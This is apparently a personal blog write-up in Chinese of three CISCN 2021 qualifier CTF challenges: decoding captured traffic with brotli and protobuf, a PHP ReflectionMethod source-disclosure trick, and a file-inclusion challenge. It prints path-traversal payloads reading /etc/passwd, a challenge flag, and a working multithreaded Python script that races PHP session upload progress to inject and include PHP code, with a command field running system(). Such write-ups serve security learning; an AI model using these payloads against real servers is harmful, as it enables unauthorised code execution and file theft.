ciscn国赛初赛

ciscn国赛初赛

前言

​ 这几天跟tony,Trendy,Kaunm师傅参加了ciscn国赛

tiny traffic

首先,下载好附件,使用Wireshark打开

image-20210516233222805

直接导出http协议的包

image-20210516223609047

在出http协议的包时会出现,两个可疑的文件

image-20210516224056416

经过Wankko Ree师傅的提示,原来是protocol,后来现学了protocol

先使用解密

import brotli
with open("test", 'rb') as f:
    test = brotli.decompress(f.read())
with open("secret", 'rb') as f:
    secret = brotli.decompress(f.read())
with open("test.proto", 'wb') as f:
    f.write(test)

运行代码后,会出现test.proto文件

这时候要使用protocol解密

https://blog.csdn.net/whatday/article/details/95353523

image-20210516224952339

我这里生成的一个test_pb2.py,直接上protocol的解码

from test_pb2 import*
import brotli
pbr = PBResponse()
with open( "secret", 'rb') as f:
    secret = brotli.decompress(f.read())
pbr.ParseFromString(secret)
print(pbr)

运行代码后,得到

image-20210516225218276

到这里像我一样英语不好的就要打开翻译了

image-20210516225618355

CISCN{e66a22e23457889b0fb1146d172a38dc}

easy_source

打开题目,就出现一句话,什么都没有

然而大佬们早就拿出初恋扫描目录了

扫出:http://139.9.117.249:20772/.index.php.swo

image-20210516225921096

经过代码的审计,得到

poyload:rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment

middle_source

先看代码

image-20210516230748310

显示的代码有include,就知道考的是文件包含,看到题目给/etc

我们要想办法绕过变量覆盖才行,poyload:field=cf&cf=../../../etc/passwd

出来了但是没啥用

又拿出我的目录扫描

image-20210516231042816

出现一个可疑的目录,访问一看

image-20210516231124896

一看you_can_seeeeeeee_me.php出现了另一个世界

image-20210516231309815

仔细看phpinfo,发现开启了session功能

学过session包含的时候早就bp上跑着了

我这里提供python脚本,跑出flag的目录

#coding=utf-8
import io
import requests
import threading

from urllib3.connectionpool import xrange

sessid = 'TGAO'
data = {"cmd":"system('ls -l /etc');", "cf":"../../../var/lib/php/sessions/aaacgceaie/sess_TGAO"}
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post( 'http://139.9.117.249:20829/index.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php var_dump(scandir("/etc/ehiehcdjab/ffcfdcbibj/deaebgchdj/ibecedbjff/fedicbaabe/fl444444g"));?>'}, files={'file': ('tgao.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
    while True:
        resp = session.post('http://139.9.117.249:20829/index.php', data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in xrange(1,30): 
            threading.Thread(target=write,args=(session,)).start()
        for i in xrange(1,30):
            threading.Thread(target=read,args=(session,)).start()
    event.set()

image-20210516232440414

poyoad:cf=../../../etc/ehiehcdjab/ffcfdcbibj/deaebgchdj/ibecedbjff/fedicbaabe/fl444444g

image-20210516232419962

posted @ 2021-05-16 23:34  小非鱼  阅读(22)  评论(0)    收藏  举报